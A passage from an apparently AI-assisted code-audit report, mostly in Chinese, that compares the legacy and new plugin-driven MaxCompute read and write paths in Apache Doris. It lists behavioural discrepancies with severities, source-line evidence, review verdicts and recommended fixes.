legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:602-613 (convertDateTimezone 以 DateUtils.getTimeZone() 即会话时区为源),556-592 (DATETIME 用 dateTime3Formatter、TIMESTAMP 用 dateTime6Formatter 转 UTC) | 两侧默认都开 DATETIME_PREDICATE_PUSH_DOWN=true。legacy 把 datetime 字面量当作"会话时区"再转 UTC 下推;翻闸把同一字面量当作"endpoint 所在 region 的固定时区"(如 cn-* → Asia/Shanghai)再转 UTC。当会话时区 ≠ MC project region 时区时,下推到 ODPS 的 datetime 边界值不同,导致 ODPS 端按不同时刻裁剪/过滤,返回行集不同。 | yes | ✅存活 (3✓/0✗ of 3) | 待定/修:确认语义上哪种时区是正确源(通常查询字面量应按会话时区解释)。若以 legacy 为基准,翻闸应改用会话时区作为 sourceZone;若有意改语义,须显式记录并加回归。当前为静默差异。 | +| READ-C4 | major | limit split 优化条件与 legacy 不一致:翻闸忽略 enable_mc_limit_split_optimization 会话变量,且分区等值谓词场景永不触发优化 | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:187-196 (useLimitOpt = limit>0 && (onlyPartitionEquality \|\| !filter.isPresent())),352-359 (checkOnlyPartitionEquality 硬编码 return false)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:735-737 (sessionVariable.enableMcLimitSplitOptimization && onlyPartitionEqualityPredicate && hasLimit()),334-375 (checkOnlyPartitionEqualityPredicate 真实实现); fe/fe-core/src/main/java/org/apache/doris/qe/SessionVariable.java:2891,2908 (默认 false) | legacy 触发限流优化需同时:会话变量 enable_mc_limit_split_optimization(默认 false)为真、且谓词全为分区等值/IN、且有 limit。翻闸:(1) 完全无视该会话变量;(2) checkOnlyPartitionEquality 恒 false,故只在"无任何 filter + limit>0"时触发,默认即触发(legacy 默认不触发);(3) 当存在分区等值谓词时翻闸永不走该优化(legacy 开关打开时会走)。 | yes | ✅存活 (3✓/0✗ of 3) | 修/接受:若要 parity,应将会话变量经 ConnectorSession 透传并实现 checkOnlyPartitionEquality 真实逻辑;若有意简化为"无 filter 时优化",须显式记录偏离。当前为静默的默认行为变更。 | +| READ-C5 | major | 分区表大表丢失 batch/streaming split 生成:PluginDrivenScanNode 不 override isBatchMode/startSplit,所有 split 在 getSplits 同步物化 | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java (无 isBatchMode/startSplit/numApproximateSplits override,继承 SplitGenerator 默认),356-378 (getSplits 一次性构建全部 split); fe/fe-core/src/main/java/org/apache/doris/datasource/SplitGenerator.java:43-45 (isBatchMode 默认 false)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:214-298 (isBatchMode 对分区表按 num_partitions_in_batch_mode 启用,startSplit 异步分批构建 read session 并流式入队) | legacy:分区表当选中分区数 ≥ num_partitions_in_batch_mode 时进入 batch 模式,startSplit 异步分批创建 read session、流式产 split,避免一次性创建巨量 session/split。翻闸:isBatchMode 恒 false,走 getSplits 同步路径,对所有选中分区一次性建 session 并物化全部 split。 | yes | ✅存活 (2✓/1✗ of 3) | 待定:大规模 MC 场景需评估是否补 SPI 层 batch 模式;短期可接受但应记录为已知差异并在大分区表压测验证。 | +| READ-C6 | major | CAST 谓词下推语义不同:翻闸默认开启 CAST 下推并直接剥离 CAST 把内层比较下推 ODPS;legacy 遇 CAST 抛异常跳过(不下推) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenScanNode.java:586-608 (supportsCastPredicatePushdown 默认 true→不过滤 CAST 谓词); fe/fe-core/src/main/java/org/apache/doris/datasource/ExprToConnectorExpressionConverter.java:106-107 (CastExpr→convert(child) 直接剥离 CAST); fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorPushdownOps.java:66-72 (默认 true)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:377-516 (convertExprToOdpsPredicate 不处理 CastExpr;child 为 CastExpr 时 convertSlotRefToColumnName 518-527 抛 AnalysisException),300-314 (convertPredicate 捕获并跳过该谓词→不下推) | legacy:含 CAST 的谓词转换失败被吞掉,不下推到 ODPS,保留给 BE 复算(保守正确)。翻闸:MaxComputeConnectorMetadata 未 override supportsCastPredicatePushdown(默认 true),buildRemainingFilter 不剔除 CAST 谓词;ExprToConnectorExpressionConverter 把 CastExpr 直接替换为其 child,于是 cast(col as T) op lit 被改写为 col op lit 下推 ODPS。 | unsure | ✅存活 (3✓/0✗ of 3) | 修/待定:MC connector 应 override supportsCastPredicatePushdown 返回 false(对齐 legacy 保守语义),或在 converter 中对会改变值语义的 CAST 不剥离。当前默认行为有产生错误结果的风险。 | +| READ-P6 | minor | checkOnlyPartitionEquality is a permanent stub (always false) — silently drops a legacy optimization branch | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanPlanProvider.java:348-359
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:334-375 (checkOnlyPartitionEqualityPredicate fully implemented: EQ-on-partition-col and IN-on-partition-col with literal lists) | Legacy fully implements onlyPartitionEqualityPredicate to enable the limit optimization when the filter is purely partition equality/IN. The connector replaces it with a stub that always returns false (comment: 'For the first iteration, we keep it simple'), so the filtered-but-partition-only limit-opt branch can never trigger in the connector. | no | ✅存活 (3✓/0✗ of 3) | 待定. Either implement the partition-equality walk to restore parity, or accept and document that limit-opt only applies to unfiltered LIMIT in the SPI path. | +| READ-C7 | minor | data 列 isKey 标记不同:legacy 列 isKey=true,翻闸经 ConnectorColumn(默认 isKey=false)→DESCRIBE/information_schema 列属性差异 | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorMetadata.java:128-147 (ConnectorColumn 5 参构造,isKey 默认 false); fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorColumn.java:32-45 (5 参→isKey=false); fe/fe-core/src/main/java/org/apache/doris/datasource/ConnectorColumnConverter.java (convertColumn 用 cc.isKey())
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MaxComputeExternalTable.java:177-179,189-190 (new Column(name, type, true/*isKey*/, null, nullable, comment, true, -1)) | legacy initSchema 对数据列与分区列均以 isKey=true 构造 Doris Column;翻闸经 SPI ConnectorColumn 默认 isKey=false,转换后 Column.isKey=false。 | yes | ✅存活 (3✓/0✗ of 3) | 待定:确认是否需对齐(getTableSchema 用 6 参 ConnectorColumn 传 isKey=true)。若接受新行为应记录。 | +| READ-C8 | minor | 翻闸 MC split 缺少 FILE_NET locationType 及 fileSize/modificationTime,locationType 可能为 null | 翻闸 fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenSplit.java:35-48 (extends FileSplit,未设 locationType=FILE_NET); fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeScanRange.java (未 override getFileSize/getModificationTime,默认 0); fe/fe-core/src/main/java/org/apache/doris/datasource/FileSplit.java:63 (locationType=path.getTFileTypeForBE()); fe/fe-core/src/main/java/org/apache/doris/common/util/LocationPath.java:388-397 + fe/.../fs/SchemaTypeMapper.java:161-167 (无 scheme 的 /byte_size 路径解析后 schema 非 null 时 map.get 返回 null)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeSplit.java:40-45 (构造里 this.locationType = TFileType.FILE_NET); fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:658-662,684-686 (传 modificationTime 与 fileLength) | legacy MaxComputeSplit 强制 locationType=FILE_NET 并携带 modificationTime/fileLength;翻闸 PluginDrivenSplit 用合成路径 /byte_size\|/row_offset 推断 locationType(很可能为 null,非 FILE_NET),且 fileSize/modificationTime 取默认 0。 | unsure | ✅存活 (3✓/0✗ of 3) | 待定:修复 buildTableDescriptor blocker 后端到端验证 JNI 读路径;如需对齐可让 MaxComputeScanRange 提供 modificationTime 且 PluginDrivenSplit 对 MC 设 FILE_NET。优先级低于前述 blocker。 | +| READ-C9 | question | 翻闸修正了 legacy 的 IN/NOT IN 下推取反 bug,导致 NOT IN 查询结果与 legacy 不同(legacy 错、翻闸对) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputePredicateConverter.java:162-177 (isNegated()? "NOT IN":"IN",正确)
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java:406-412 (odpsOp = inPredicate.isNotIn()? IN : NOT_IN,取反) | legacy 把 NOT IN 下推为 ODPS IN、IN 下推为 NOT IN(取反 bug)。因 IN/NOT IN 谓词仍保留在 conjuncts 由 BE 复算,但下推到 ODPS 的取反谓词会让 ODPS 返回错误集合:NOT IN(x) 被当成 IN(x) 下推→ODPS 只返回 col IN(x) 的行,BE 再 NOT IN 过滤→结果近乎空(漏数据)。翻闸修正了取反,NOT IN 结果正确。 | no | ✅存活 (3✓/0✗ of 3) | 接受(并记录):确认为有意修正 legacy bug;回归用例应以正确语义为基线,避免误判为差异。 | + +**Phase C 交叉核对:** + +| finding | 分类 | history_ref | note | +|---|---|---|---| +| READ-P1 PluginDriven MC toThrift 发 SCHEMA_TABLE 无 TMCTable;BE static_cast 到 MaxComputeTableDescriptor → 错/垃圾凭证、无鉴权 | new | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:11,165 / plan-doc/HANDOFF.md:35 | 历史文档无任何记载。代码已核实:MaxComputeConnectorMetadata 未 override buildTableDescriptor(grep NO OVERRIDE),ConnectorTableOps.java:146-151 默认返 null,PluginDrivenExternalTable.java:252-258 走 null 兜底产 TTableType.SCHEMA_TABLE。legacy MaxComputeExternalTable.java:305-322 产 MAX_COMPUTE_TABLE+TMCTable(endpoint/project/quota/table/properties)。be/src/exec/scan/file_scanner.cpp:1067-1073 在 table_format_type=='max_compute' 时无条件 static_cast 到 MaxComputeTableDescriptor* → 对 SchemaTableDescriptor 是类型混淆。历史反而在 cutover-design:11/:165 声称读路径 parity(见 disputed_claims)。这是翻闸后读路径整体不可用的 blocker,历史完全漏记。 | +| READ-P2 byte_size split 发 size=splitByteSize 而非 -1;BE 误判为 ROW_OFFSET → 损坏读(默认 split 策略) | new | (无历史记载) | 代码已核实全链路:MaxComputeScanPlanProvider.java:268 .length(splitByteSize) → MaxComputeScanRange.java:122 rangeDesc.setSize(getLength()) → be/src/format/table/max_compute_jni_reader.cpp:70 properties['split_size']=range.size → MaxComputeJniScanner.java:125-128 splitSize==-1 才选 BYTE_SIZE,否则 ROW_OFFSET。legacy MaxComputeScanNode.java:656-662 new MaxComputeSplit(BYTE_SIZE_PATH, splitIndex, -1, splitByteSize,...) → 3rd 参 length=-1,splitByteSize 进 fileLength(未用),故 legacy size=-1。SPLIT_BY_BYTE_SIZE 是默认 split 策略(MCProperties),故默认配置下每个 byte_size split 被 BE 当成 RowRangeInputSplit(sessionId, startOffset=splitIndex, rowCount=splitByteSize) 误读。历史零记载。 | +| READ-P3 分区裁剪整体丢失:PluginDrivenExternalTable 不报分区列 + connector 恒传 requiredPartitions=emptyList → 整表扫 | new | plan-doc/tasks/P4-maxcompute-migration.md:45 / plan-doc/HANDOFF.md:35 | 代码核实:PluginDrivenExternalTable.java 不 override supportInternalPartitionPruned/getPartitionColumns/getNameToPartitionItems(grep NO OVERRIDES,继承 ExternalTable 默认 false/empty);MaxComputeScanPlanProvider.java:201,316 requiredPartitions=Collections.emptyList()。legacy MaxComputeExternalTable.java:83-114 支持 internal pruning + MaxComputeScanNode 传 pruned requiredPartitions。历史 P4 文档凡提'分区裁剪'(tasks/P4:45 验收 golden/手测)都把它当 PASS 或未验证,grep plan-doc 全部分区裁剪条目实指 Hudi(P3-T05),无一条针对 MC P4 读路径。HANDOFF:35 SELECT(含分区裁剪) 标 ✅ PASS。新发现、与历史 PASS 声称直接冲突。 | +| READ-P4 DATETIME/TIMESTAMP 谓词下推损坏:LocalDateTime.toString() 过不了 DATETIME_3/6 formatter → 谓词静默丢弃(且源时区错) | new | (无历史记载) | 代码核实:ExprToConnectorExpressionConverter.java:315-320 把 datetime 字面量带为 java.time.LocalDateTime;MaxComputePredicateConverter.java:254-263 用 'yyyy-MM-dd HH:mm:ss.SSS' formatter 解析 String.valueOf(ldt) 的 ISO-8601 串('2023-02-02T00:00') → 抛异常;convert():84-89 吞异常返 NO_PREDICATE。legacy MaxComputeScanNode.java:558-593 用 getStringValue(DatetimeV2(3/6)) 产 'yyyy-MM-dd HH:mm:ss.SSS'。历史零记载。第二重分歧(源时区 endpoint-region vs 会话时区)即 READ-C3。 | +| READ-P5 LIMIT 单 split 优化无条件应用(忽略 enable_mc_limit_split_optimization 会话变量,默认 off) | new | (无历史记载) | 代码核实:MaxComputeScanPlanProvider.java:186-196 useLimitOpt = limit>0 && (onlyPartitionEquality\|\|!filter.isPresent()),无任何会话变量门控;checkOnlyPartitionEquality:352-359 硬编码 return false。legacy MaxComputeScanNode.java:735-737 三重门 sessionVariable.enableMcLimitSplitOptimization(SessionVariable.java:2908 默认 false) && onlyPartitionEqualityPredicate && hasLimit()。连接器够不到会话变量。历史零记载,行为默认即偏离 legacy 默认。 | +| READ-P6 checkOnlyPartitionEquality 永久 stub(恒 false) — 静默丢弃 legacy 优化分支 | new | (无历史记载) | 代码核实:MaxComputeScanPlanProvider.java:348-359 注释自陈 'For the first iteration, we keep it simple and always return false'。legacy MaxComputeScanNode.java:334-375 完整实现 EQ/IN-on-partition-col。历史零记载。与 READ-P5/C4 同根(连接器 limit-opt 条件实现不完整)。 | +| READ-C1 翻闸读取生成 SCHEMA_TABLE 描述符,BE static_cast 到 MaxComputeTableDescriptor 形成类型混淆,读路径整体不可用 | new | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:11,165 / plan-doc/HANDOFF.md:35 | 与 READ-P1 同一 blocker(中文对抗 agent 独立复核)。代码核实点全部一致:MaxComputeConnectorMetadata 无 buildTableDescriptor override;ConnectorTableOps:146-151 默认 null;PluginDrivenExternalTable:252-258 SCHEMA_TABLE 兜底;file_scanner.cpp:1067-1073 无条件 static_cast。新发现、历史漏记且历史声称读路径 parity(disputed)。 | +| READ-C2 翻闸侧分区裁剪缺失:planScan 永传空 requiredPartitions,且 PluginDrivenExternalTable 不支持 internal pruning,分区表退化整表扫 | new | plan-doc/tasks/P4-maxcompute-migration.md:45 / plan-doc/HANDOFF.md:35 | 与 READ-P3 同一发现(中文对抗 agent 复核,额外指出 MaxComputePredicateConverter:84-89/132-135 整体回退使 filter-only 裁剪在复杂 WHERE 时也失效)。代码核实一致。新发现、与 HANDOFF:35 'SELECT(含分区裁剪) ✅ PASS' 直接冲突。 | +| READ-C3 DATETIME/TIMESTAMP 谓词下推源时区不同:legacy 用会话时区,翻闸用 endpoint region 静态时区 | new | (无历史记载) | 代码核实:MaxComputeScanPlanProvider.java:221-224 sourceZone = MCConnectorEndpoint.resolveProjectTimeZone(endpoint);MCConnectorEndpoint.java region→ZoneId 静态表。legacy MaxComputeScanNode.java:602-613 用 DateUtils.getTimeZone()(会话时区)。这是 READ-P4 的第二重分歧(即便解析成功也时区错)。历史零记载。注:实践中常被 READ-P4 的解析异常先掩盖(谓词整体丢)。 | +| READ-C4 limit split 优化条件与 legacy 不一致:翻闸忽略会话变量且分区等值场景永不触发 | new | (无历史记载) | 与 READ-P5+READ-P6 合并的中文复核。代码核实一致:MaxComputeScanPlanProvider.java:187-196 + 352-359 stub。历史零记载。 | +| READ-C5 分区表大表丢失 batch/streaming split 生成:PluginDrivenScanNode 不 override isBatchMode/startSplit,所有 split 同步物化 | new | (无历史记载) | 代码核实:PluginDrivenScanNode.java 无 isBatchMode/startSplit/numApproximateSplits override(继承 SplitGenerator.java:43-45 默认 false),getSplits 一次性构建。legacy MaxComputeScanNode.java:214-298 对分区数≥num_partitions_in_batch_mode 启用 batch 异步流式建 session。历史零记载。属性能/可扩展性回归(巨量分区表 OOM/慢),非正确性。 | +| READ-C6 CAST 谓词下推语义不同:翻闸默认开启并剥离 CAST 把内层比较下推 ODPS;legacy 遇 CAST 跳过不下推 | new | (无历史记载) | 代码核实:PluginDrivenScanNode.java:586-608 supportsCastPredicatePushdown 默认 true;ExprToConnectorExpressionConverter.java:106-107 CastExpr→convert(child) 剥离 CAST;ConnectorPushdownOps.java:66-72 默认 true;MaxComputeConnectorMetadata 未 override。legacy MaxComputeScanNode.java:518-527 遇 CastExpr 抛 AnalysisException → convertPredicate:300-314 捕获跳过(不下推,保守正确)。历史零记载。剥 CAST 下推可能因 ODPS 端隐式转换语义不同于 Doris 而返回错误行集。需 live 判定严重性。 | +| READ-C7 data 列 isKey 标记不同:legacy isKey=true,翻闸经 ConnectorColumn 默认 isKey=false → DESCRIBE/information_schema 差异 | new | (无历史记载) | 代码核实:MaxComputeConnectorMetadata.java:128-147 用 ConnectorColumn 5 参构造(ConnectorColumn.java:32-45 → isKey=false)。legacy MaxComputeExternalTable.java:177-190 new Column(...,true/*isKey*/,...)。历史零记载。元数据展示差异(minor),不影响读数。 | +| READ-C8 翻闸 MC split 缺 FILE_NET locationType 及 fileSize/modificationTime,locationType 可能为 null | new | (无历史记载) | 代码核实:MaxComputeScanRange.java 用合成路径 /byte_size\|/row_offset(getPath:75-81),未 override getFileSize/getModificationTime(默认 0);PluginDrivenSplit.java extends FileSplit 未设 locationType=FILE_NET → FileSplit.java:63 由 path.getTFileTypeForBE() 推断,无 scheme 的合成路径很可能解析为 null。legacy MaxComputeSplit.java:43 构造里强制 this.locationType = TFileType.FILE_NET(已核 MaxComputeSplit 构造体)。历史零记载。 | +| READ-C9 翻闸修正了 legacy 的 IN/NOT IN 下推取反 bug,导致 NOT IN 结果与 legacy 不同(legacy 错、翻闸对) | new | (无历史记载) | 代码核实:MaxComputePredicateConverter.java:162-177 isNegated()?'NOT IN':'IN'(正确)。legacy MaxComputeScanNode.java:406-412 odpsOp = inPredicate.isNotIn()? IN : NOT_IN(取反 bug)。历史零记载。这是翻闸侧的行为改善(修了 legacy 漏数据 bug),但与 legacy 行为不同 → 翻闸 parity-by-comparison 测会失败。question 类:需确认是否接受'与 legacy 不一致但更正确'。 | + +### 路径2 — 写入 (INSERT / INSERT OVERWRITE / OVERWRITE PARTITION / 事务 / commit 协议 / block 分配) + +| id | severity | title | evidence (翻闸 / legacy) | legacy-diff | regression | adversarial-verdict | recommendation | +|---|---|---|---|---|---|---|---| +| WRITE-P1 | major | 翻闸后 MaxCompute INSERT 向客户端/审计日志报告的影响行数恒为 0(loadedRows 未回填) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:146-150 (doBeforeCommit, 事务模型下 insertHandle 恒为 null,整段被跳过,loadedRows 永不赋值); fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/BaseExternalTableInsertExecutor.java:197,201,203 (用 loadedRows 设 setOk / setOrUpdateInsertResult / updateReturnRows)
legacy fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java:76 (doBeforeCommit 中 loadedRows = transaction.getUpdateCnt()); fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:258-261 (getUpdateCnt = sum(TMCCommitData.row_count)) | legacy:INSERT 成功后客户端返回真实影响行数,SHOW INSERT RESULT / fe.audit.log returnRows 正确。翻闸:loadedRows 停留在 AbstractInsertExecutor 默认值 0(AbstractInsertExecutor.java:69),用户/审计看到 'affected rows: 0',尽管数据已正确写入。 | yes | ✅存活 (3✓/0✗ of 3) | 修。在 PluginDrivenInsertExecutor.doBeforeCommit() 的事务模型分支(connectorTx != null)加 loadedRows = transactionManager.getTransaction(txnId).getUpdateCnt();(或经 connectorTx.getUpdateCnt()),与 legacy MCInsertExecutor 及其它事务型执行器对齐。属可观察行为回归,虽不损数据但影响用户/审计/工具对写入结果的判读。 | +| WRITE-C1 | major | 翻闸丢失 loadedRows 回填:MC INSERT 报告的 rows affected 退化为 0(legacy 用 getUpdateCnt 覆盖) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:146-150; fe/fe-core/src/main/java/org/apache/doris/transaction/PluginDrivenTransactionManager.java:182-185; fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java:158-160
legacy fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java:74-78; fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:259-261 | legacy MC 在 commit 前用 transaction.getUpdateCnt()(= 累加各 BE 回传的 TMCCommitData.row_count)覆盖 loadedRows;翻闸路径在事务模型下 doBeforeCommit 什么都不做(insertHandle==null),loadedRows 保留 AbstractInsertExecutor.execImpl 从 coordinator DPP_NORMAL_ALL 取到的值。而 BE 的 MaxCompute sink 只通过 TMCCommitData.row_count(be/src/exec/sink/writer/maxcompute/vmc_partition_writer.cpp:65)与 profile counter(vmc_table_writer.cpp:199)上报行数,从不更新 runtime_state->num_rows_load_success(即 DPP_NORMAL_ALL,见 be/src/exec/pipeline/pipeline_fragment_context.cpp:2098/2126),所以对 MC 写入 DPP_NORMAL_ALL 为 0。 | yes | ✅存活 (3✓/0✗ of 3) | 修。在 PluginDrivenInsertExecutor.doBeforeCommit 的事务模型分支(connectorTx!=null)里回填 loadedRows = transactionManager.getTransaction(txnId).getUpdateCnt(),对齐 legacy。getUpdateCnt 链路已存在(PluginDrivenTransaction.getUpdateCnt -> connectorTx.getUpdateCnt),只差一行赋值。 | +| WRITE-P2 | minor | block 分配上限硬编码 20000,忽略可配置的 Config.max_compute_write_max_block_count | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java:72 (private static final long MAX_BLOCK_COUNT = 20000L); 同文件 146-148 用其判越界
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:165-169 (用 Config.max_compute_write_max_block_count 判越界); fe/fe-common/src/main/java/org/apache/doris/common/Config.java:2156 (默认 20000L,运行期可配) | legacy 上限随 FE 配置 max_compute_write_max_block_count 变化;翻闸固定 20000。若运维调高该配置以支持超大写入(大量 BE 写 fragment 申请大量 block),legacy 放行,翻闸仍在 20000 处抛 'block_id exceeds limit' 拒绝整条写入。 | yes | ✅存活 (3✓/0✗ of 3) | 待定。建议经 connector 配置/会话属性把该上限透传给 MaxComputeConnectorTransaction,而非硬编码,以恢复可配置语义;若产品上确认该配置不再支持调整,应在 release note 显式声明该能力收敛。是窄口径但真实的行为差异。 | +| WRITE-C2 | minor | 翻闸硬编码 block 上限 20000,忽略 fe.conf 的 max_compute_write_max_block_count 覆盖 | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java:67-72,146-149
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:165-169; fe/fe-common/src/main/java/org/apache/doris/common/Config.java:2154-2156 | legacy 的 block 上限读 Config.max_compute_write_max_block_count(可在 fe.conf 配置,默认 20000);翻闸把它写死成常量 20000,无法被运维覆盖。两者默认值相同,仅在运维显式调大该配置时产生差异。 | yes | ✅存活 (3✓/0✗ of 3) | 待定/可接受但应登记。最干净的修法是把该上限作为 connector 属性在建 connector 时从 fe-core Config 注入(类似其它 timeout/retry 属性已走 MCConnectorProperties),而非写死常量;若决定接受,应在用户文档/release note 注明翻闸后该 fe.conf 配置对 MC 写入不再生效。 | +| WRITE-C3 | minor | 翻闸吞掉 MC 写入的 post-commit cache 刷新异常,legacy 会向上抛 DdlException | 翻闸 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:165-174
legacy fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java (无 doAfterCommit override); fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/BaseExternalTableInsertExecutor.java:133-140 | legacy MC 用基类 doAfterCommit:commit 后做 handleRefreshTable,若刷新失败抛 DdlException,INSERT 被标记为失败(尽管数据已提交)。翻闸把 commit 后的刷新失败吞成 warn 日志,INSERT 仍报成功。对 MC 这种 FE 端驱动 commit 的事务模型,数据在 connectorTx.commit() 已落 ODPS,刷新失败时翻闸的行为(报成功 + cache 暂陈旧)其实比 legacy(报失败、诱导重试导致重复写)更安全;但它确实改变了 legacy 的可观察行为。 | yes | ✅存活 (3✓/0✗ of 3) | 接受(改进而非退化),但建议确认:该 doAfterCommit 注释主要论证 JDBC_WRITE 场景的安全性,对 MC 事务模型同样适用(commit 已发生、不可回滚),逻辑成立。仅需在文档登记这是有意的行为变更。 | +| WRITE-P3 | question | 提交后缓存刷新失败的处理语义对 MaxCompute 发生改变(legacy 抛错=INSERT 报失败,翻闸吞错=INSERT 报成功) | 翻闸 fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/PluginDrivenInsertExecutor.java:166-174 (override doAfterCommit,try super.doAfterCommit() 后 catch 全部异常仅 warn,不外抛)
legacy fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/MCInsertExecutor.java:1-84 (整文件无 doAfterCommit override,沿用基类); fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/commands/insert/BaseExternalTableInsertExecutor.java:133-140 (doAfterCommit 做 handleRefreshTable,可抛 DdlException 向上传播) | legacy MaxCompute:commit 成功后若 post-commit 缓存刷新(handleRefreshTable)失败,DdlException 上抛,INSERT 被报告为失败(尽管远端数据已提交,易误导用户重试导致重复)。翻闸:同样场景被 catch+warn,INSERT 报成功、缓存留待下次刷新。 | unsure | ✅存活 (3✓/0✗ of 3) | 接受但需确认。建议在 deviations-log 显式登记此语义变更(legacy MC 抛错 -> 翻闸吞错),并确认这是预期收敛;非有害回归,倾向保留翻闸行为。 | +| WRITE-C4 | question | 静态分区 spec 过滤所用的分区列名来源两侧不同(legacy=Doris 列名,翻闸=ODPS 列名) | 翻闸 fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeWritePlanProvider.java:99-100,188-194
legacy fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/MCTransaction.java:104-108 | 两侧都按分区列顺序把 staticSpec 拼成 'col=val,col=val',但过滤所依据的分区列名集合来源不同:legacy 用 Doris 外表分区列名(table.getPartitionColumns()),翻闸用 ODPS schema 分区列名(odpsTable.getSchema().getPartitionColumns())。staticPartitionSpec 的 key 来自 SQL PARTITION(col=val) 解析(两路相同,见 InsertIntoTableCommand:574-581 与 599-613)。若 ODPS 返回的分区列名大小写与 Doris 侧/用户 SQL 写法不一致,containsKey 过滤可能漏掉某列,导致静态分区 spec 被部分/全部丢弃,从而误走动态分区写入。 | unsure | ✗否决 (0✓/3✗ of 3) | 待定。建议补一个对照测试:含混合大小写分区列名的 MC 静态分区 INSERT OVERWRITE PARTITION,断言翻闸生成的 PartitionSpec 与 legacy 一致;或在 buildStaticPartitionSpecString 用大小写不敏感匹配以消除来源差异带来的风险。 | + +**Phase C 交叉核对:** + +| finding | 分类 | history_ref | note | +|---|---|---|---| +| WRITE-P1 翻闸后 MaxCompute INSERT 报告影响行数恒为 0(loadedRows 未回填) | disagreement | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:114 | 历史(cutover 设计 W-c)明确写 `doBeforeCommit/onFail already guard on insertHandle != null → null for MC ⇒ correctly skipped`,把 MC 跳过 doBeforeCommit 当成'正确/无问题'。本轮不认同:legacy MCInsertExecutor.doBeforeCommit():76 在 finishInsert 之外还有一行 `loadedRows = transaction.getUpdateCnt()`,这是 load-bearing 副作用。同设计 §4.1 W-c 声称该 restructure 'mirrors legacy MCInsertExecutor',但翻闸 PluginDrivenInsertExecutor.java:146-150 的 txn-model 分支 insertHandle==null 时整段被跳,loadedRows 永远停在 AbstractInsertExecutor 的 0(MC sink 从不填 DPP_NORMAL_ALL,见 be/.../pipeline_fragment_context.cpp:2098/2126 + vmc_partition_writer.cpp:65 只填 TMCCommitData.row_count)。证据已逐行核实:PluginDrivenInsertExecutor.java:146-150 + BaseExternalTableInsertExecutor.java:197/201/203 用 loadedRows + AbstractInsertExecutor.java:69/221-222 vs MCInsertExecutor.java:76 + MCTransaction.java:259-261。SPI 设计本身(connector-write-spi-rfc.md:132 '结果行数:txn.getUpdateCnt()'、:166 'getUpdateCnt 聚合')要求用 getUpdateCnt,PluginDrivenTransaction.java:183-185 / MaxComputeConnectorTransaction.java:158-160 也实现了 getUpdateCnt,但 executor 在 txn-model 路径上从不调用它。属 major 回归且设计文档误判为'已正确处理'。 | +| WRITE-C1 翻闸丢失 loadedRows 回填:MC INSERT rows affected 退化为 0 | disagreement | plan-doc/tasks/designs/P4-T05-T06-cutover-design.md:114 | 与 WRITE-P1 同一根因,C-path 独立证据链更全(含 BE 侧)。同样与 cutover 设计 W-c :114 '... correctly skipped' 主张分歧。BE 链:vmc_partition_writer.cpp:65 __set_row_count + vmc_table_writer.cpp:199 profile counter,均不更新 runtime_state->num_rows_load_success → pipeline_fragment_context.cpp:2098/2126 的 s_dpp_normal_all=0 → AbstractInsertExecutor.java:221-222 取到 0。legacy 用 MCTransaction.getUpdateCnt()(MCInsertExecutor.java:76)覆盖回真实行数。翻闸 PluginDrivenInsertExecutor.java:146-150 / 